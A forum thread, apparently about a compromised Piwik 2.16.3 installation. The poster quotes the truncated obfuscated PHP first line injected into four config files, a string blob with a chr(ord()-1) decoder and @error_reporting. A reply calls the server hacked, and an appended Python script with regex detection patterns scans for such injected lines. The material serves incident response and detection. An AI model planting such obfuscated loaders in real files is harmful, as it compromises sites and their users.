Syntax error in INI configuration -> security problem ($ozwnijtsn)

Hi folks. One of my customers called me to fix the following problem:

What I found was four changed INI files.

  • config/config.ini.php
  • plugins/PiwikPro/config/test.php
  • plugins/MobileAppMeasurable/config/test.php
  • plugins/CorePluginsAdmin/config/config.php

Every INI file has the same first “unusual” line:

<?php $ozwnijtsn = '75]D:M8]Df#<%tdz>#L4]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]2,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*cvpbbyz($n){return chr(ord($n)-1);} @error_reporbq}k;opjudovg}x;0]=]).....

The Piwik installation version was 2.16.3. My question is, does anyone know this security issue, because I didn't find any advice? My solution to fix the problem was to reinstall the whole Piwik with an actual version. I am thankful for every hint!

This looks very much like your server has been hacked. I would treat the installation as compromised and re-install (or restore from backup).
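To find every file carrying the same kind of injected first line before reinstalling, a first-line scan over the config paths named in the question can help. The following is an added example, not code from either poster or from the Piwik project; the regex heuristics, the glob patterns and all sample file contents (including the guard comment line in the clean file) are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics derived from the injected line quoted in the post: a PHP open tag
# followed by a long string assigned to a variable, a chr(ord(...)) decoder,
# and a call silenced with "@".
INDICATORS = {
    "php_var_blob": re.compile(r"^\s*<\?php\s+\$\w+\s*=\s*'[^']{40,}"),
    "chr_ord_decoder": re.compile(r"chr\s*\(\s*ord\s*\("),
    "silenced_call": re.compile(r"(?<!\w)@[A-Za-z_]\w*"),
}

def first_line_findings(text):
    """Return sorted indicator names that match the first non-empty line."""
    for line in text.splitlines():
        if line.strip():
            return sorted(n for n, rx in INDICATORS.items() if rx.search(line))
    return []

def scan_tree(root, patterns=("config/*.php", "plugins/*/config/*.php")):
    """Map relative path -> findings for each config file with at least one hit."""
    root, hits = Path(root), {}
    for pattern in patterns:
        for path in sorted(root.glob(pattern)):
            found = first_line_findings(path.read_text(errors="replace"))
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits

def build_sample_tree(root):
    """Write constructed sample files (not taken from the affected server)."""
    injected = ("<?php $x1 = '" + "A" * 60 + "'; function d($n)"
                "{return chr(ord($n)-1);} @error_reporting(0); ?>\n")
    samples = {
        "config/config.ini.php": injected + "[General]\nsalt = \"constructed\"\n",
        "config/global.ini.php": "; <?php exit; ?> DO NOT REMOVE THIS LINE\n[General]\n",
        "plugins/Demo/config/test.php": "<?php\nreturn array();\n",
        "plugins/Demo2/config/config.php": injected + "<?php\nreturn array();\n",
    }
    for rel, body in samples.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, found in scan_tree(tmp).items():
            print(f"SUSPICIOUS {rel}: {', '.join(found)}")
```

A clean result from this scan does not show the server is clean; it only covers the first line of the config files it globs, so the installation should still be treated as compromised.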